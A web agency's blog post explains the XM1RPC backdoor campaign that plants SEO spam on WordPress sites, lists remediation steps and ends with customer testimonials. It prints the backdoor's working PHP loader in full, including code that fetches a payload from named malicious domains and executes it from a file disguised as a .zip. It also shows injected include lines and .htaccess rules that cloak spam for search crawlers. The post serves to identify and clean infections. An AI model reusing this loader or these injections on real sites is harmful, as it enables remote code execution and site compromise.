[Solved] Xm1rpc Backdoor WordPress SEO Spam Hack

I’ve recently come across an issue with some of our monitored WordPress websites in which some sort of malicious code and files have appeared into the root directory of our WordPress websites. the hack is called the XM1RPC campaign which is an SEO spam distribution backdoor hack.
Xm1rpc Backdoor WordPress SEO spam hack 2016 I’ve recently come across an issue with some of our monitored WordPress websites in which some sort of malicious code and files have appeared into the root directory of our WordPress websites. the hack is called the XM1RPC campaign which is an SEO spam distribution backdoor hack. The hack is identified by the following: The default WordPress xmlrpc.php file is replaced with xm1rpc.php which will contain code looking similar to
$query = isset($_SERVER['QUERY_STRING'])? $_SERVER['QUERY_STRING']: ''; if (false !== strpos($query, 'simpler-ws')) { __1get_ws(); $ws_hash = md5('wsa'); $cache_dir = __1get_root(); $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; require($ws_file); die(''); } function __1get_root() { $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); return $root_path; } function __1get_ws() { $host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: ''; $ws_hash = md5('wsa'); $cache_dir = __1get_root(); $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*24*1)) { $ws = __1fetch_url(__get_rev().'&get_ws'); if (!empty($ws)) file_put_contents($ws_file, $ws); } else { $ws = file_get_contents($ws_file); } return $ws; } function __get_rev() { return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); return 'http://nezlobudnya.com/generate'; } function __1fetch_url($url) { $contents = false; $errs = 0; while ( !$contents && ($errs++ < 3) ) { $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'; if (is_callable('curl_init')) { $c = curl_init($url); curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_USERAGENT,$user_agent); $contents = curl_exec($c); if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false; curl_close($c); } else { $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen')); if ($allowUrlFopen) { $options = array('http' => array('user_agent' => $user_agent)); $context = stream_context_create($options); $contents = @file_get_contents($url, false, $context); } } } return $contents; }

The xm1rpc file acts similarly to a backdoor. The attacker fetches code from malicious domains such as bokoinchina[.]com and nezlobudnya[.]com. The following files are injected with the following / similar code.
  • Wp-include/index.php
  • Wp-admin/index.php
  • Wp-admin/load.php
  • Index.php
                                                                                                                                                                  
error_reporting(0);ini_set("display_errors",0);$localpath=getenv("SCRIPT_NAME");
$absolutepath=getenv("SCRIPT_FILENAME");
$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
include_once($root_path."/d730d81e7e1033a51c2bddc5c68874ce.zip");
Inside the htaccess files, the following rewrite statements have been added or similar.
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]

RewriteEngine On
RewriteRule ^file\/[a-zA-Z0-9]+\/[0-9]+\/$ file.php [L]


RewriteEngine On
RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.sql$ file.php?$1=$2-$3 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]


RewriteEngine On
RewriteRule ^kgc\/[a-zA-Z0-9]+\/[0-9]+\/$ kgc.php [L]


RewriteEngine On
RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.sql$ file.php?$1=$2-$3 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]

RewriteEngine On

A bunch of encrypted .zip files has been uploaded to root directories and wp-include. It will appear that these files are .zip but in reality, they are they execute PHP code. In my case, malicious code was added to /wp-includes/load.php, which is a WordPress core file. The injected code is able to create the xm1rpc.php file which reinfects the .htaccess:

How To Prevent XM1RPC.Php Infection.

  • Try adding a fresh install of wp-includes to your website.
  • Remove malicious code from all infected files mentioned above.
  • Change passwords for any accounts on your WordPress site, use strong passwords
  • Avoid hosting several websites under the same shared account because it can lead to cross-contamination and infect multiple websites on the same server
  • Update WordPress / CMS to the latest versions and update all plugins.
  • Install a firewall on your website
  • Check your core file integrity using plugins such as word fence
Nathan Angel
Nathan Angel
2023-09-13
"Brett and the team at Revibe Digital are a long term trusted partner of ours. From the outset, their professionalism and commitment to delivering outstanding results were evident. Their project work on our websites, digital strategy, and SEO is at the professional level our business requires. They've expertly handled our websites, especially with Joomla and WordPress. Their approach to digital strategy and SEO has been exceptional, and the website development services they offer are seamless and provide exceptional UX. Communication with Brett is always straightforward, and he consistently meets deadlines and stays on budget. I'd highly recommend Revibe Digital. We are looking forward to continuing to work together in the future. Thanks, Revibe Digital Team!"
Sherilee Jane
Sherilee Jane
2023-07-02
Brett, Revibe Digital provided excellent 5* communication, from introduction, to completion and follow on support, growing our small business far beyond our expectations and goals. Sherilee & Liana Vision Equestrian, Manawatu & Marlborough
Local Food NZ
Local Food NZ
2023-05-23
Brett was so helpful and super efficient. He had fixed our website problem within 2 hours of my first point of contact. Highly recommend
Greg Heller
Greg Heller
2023-03-04
We are running a Joomla website that was several versions down-level, our commercial server service had an issue during a conversion. and we were unable to get into the back-end of our site. Several 'Joomla experts' later it still wasn't fixed. We ran across Revibe Digital and Brett during a Google search and Brett told us he could help us. Brett was true to his word and our website was up and running again. We were amazed at how quickly he fixed the site, it's not easy when you are a half a world away to coordinate passwords and others parameters. Brett also treated us like we were family when it came to the billing for his work. I was blown away at how reasonable his charges were. If you are looking for an extremely competent Software Engineer that knows his product line then look no further. I wholeheartedly recommend you contact Brett at Revibe Digital no matter where in the world you reside. Thank you very much Brett.
andrew binstock
andrew binstock
2023-02-26
Great work! We hired Revibe to finish up a Joomla project begun by another firm that was not going well. With a minimum of direction, they jumped in right away and took care of all outstanding tasks, exactly as we asked for. It was quite a thrill to watch a firm move so quickly and understand what was needed with only two emails of explanation. In addition, pricing was very fair. Our only regret is that we didn't start with Revibe to begin with. Highly recommended!
David Lloyd
David Lloyd
2023-02-03
We have really enjoyed working with Brett. He is generous with his advice and quick to understand and meet any brief.
Mick Skahill
Mick Skahill
2022-11-06
First class
Leshana Vanderpoel
Leshana Vanderpoel
2022-09-28
Brett is incredibly helpful. He is extremely knowledgeable re websites and how to make it work best for the individuals needs. 😊
Gillian Candler
Gillian Candler
2022-09-09
Brett at Embed Web Design provided amazing service. He responded quickly to my plea for help with a website problem and resolved it very quickly. I highly recommend this company.
PJ Morris
PJ Morris
2022-01-10
Working with Brett @ Embed has been fantastic! He is always super helpful, quick to respond to queries and get things fixed. No query has been met with no, a solution to what we wanted to do has always been found. They work well with our other suppliers, and are always helpful.